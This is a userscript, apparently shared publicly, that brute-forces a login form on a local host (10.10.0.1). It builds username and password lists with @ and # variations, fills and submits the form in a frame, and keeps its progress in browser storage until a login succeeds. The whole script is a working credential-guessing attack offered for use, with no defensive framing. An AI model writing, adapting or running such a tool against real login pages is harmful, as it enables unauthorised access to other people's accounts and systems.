NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript==
// @name Form Brute Force
// @namespace none
// @version 0.1
// @description Brute-force a login page
// @author none
// @match http*://10.10.0.1/*
// @noframes
// @updateURL https://openuserjs.org/meta/eileen12/Form_Brute_Force.meta.js
// @license MIT
// ==/UserScript==
'use strict';
let loginmap;
let loginmarker;
(function(){
loadSettings();
if(document.readyState!=="complete")
{
document.onreadystatechange = function(){
if(document.readyState==="complete"){
start();
}
};
}
})();
function loadSettings()
{
loginmap = JSON.parse(localStorage.getItem("loginmap"));
loginmarker = JSON.parse(localStorage.getItem("loginmarker"));
// Set defaults if no settings found
if(loginmarker===null){
loginmarker = -1;
localStorage.setItem("loginmarker",loginmarker);
console.log("Initialize login marker to: "+loginmarker);
}
if(loginmap===null){
loginmap = makeLoginmap();
localStorage.setItem("loginmap",JSON.stringify(loginmap));
console.log("Initialize login map.");
}
}
function reset()
{
localStorage.clear();
}
function start() {
console.log("Ready State: "+document.readyState)
// Display previously tried login pair
if(loginmarker<0)console.log("First run.");
else{
console.log("Last tried login pair("+loginmarker+")-");
console.log(" Username: "+loginmap[loginmarker].username);
console.log(" Password: "+loginmap[loginmarker].password);
}
let targetframe = document.getElementsByName("mail_main")[0];
if(!targetframe){console.log("No target frame found!");return;}
// Check if login was done
if(targetframe.src.includes("loginstatus=true"))
{
// Login done!
if(loginmarker<0)console.log("Was already logged in.");
else console.log("Login done!");
return;
}
else
{
let message = decodeURIComponent(targetframe.src.match(/(?<=message=)[^\&]*/i)[0]).replace(/\+/g, ' ');
console.log("Current Message: "+message);
let form = targetframe.contentWindow.document.clientloginform;
form.agreepolicy.checked = true;
form.loginbtn.disabled = false;
if(!form){console.log("No login form found!"); return;}
// If incorrect login
if(loginmarker<0 || message.includes("Wrong"))
{
if(loginmarker>=0)console.log("Incorrect login pair.");
// Increment to next login pair and save in storage
++loginmarker;
localStorage.setItem("loginmarker",loginmarker);
}
// Check for marker at end of map
if(loginmap[loginmarker]===undefined)
{
console.log("BruteForce finished, no login pair found.(Try to use a different login pair map)");
reset();
}
else
{
// Update form values and submit
form.username.value = loginmap[loginmarker].username;
form.password.value = loginmap[loginmarker].password;
form.loginbtn.click();
}
}
};
// This function creates user mappings
// Return an array of objects like [{username:"opt",password:"pass"}]
function makeLoginmap()
{
let loginmap = []
let passkeys = ["opt2","opt3","user","lpu","exam","fair","event","workshop","east","capital","lumin","superuser","azure","techgig"]
let usernames = ["opt","opt2","opt3","opt4","opt5","opt6","opt7","opt8","opt9","opt10","opt11"]
// This function morphs keys to get variation
let getpasskeymorphs = function(key){
return [key+"@",
"@"+key,
key+"#",
"#"+key,
"@"+key+"#",
"#"+key+"@"]
}
for(let user in usernames)
{
for(let passkey in passkeys)
{
loginmap.push({username:usernames[user],password:passkeys[passkey]})
let passmorphs = getpasskeymorphs(passkeys[passkey])
for(let passmorph in passmorphs)
{
loginmap.push({username:usernames[user],password:passmorphs[passmorph]})
}
}
}
return loginmap
}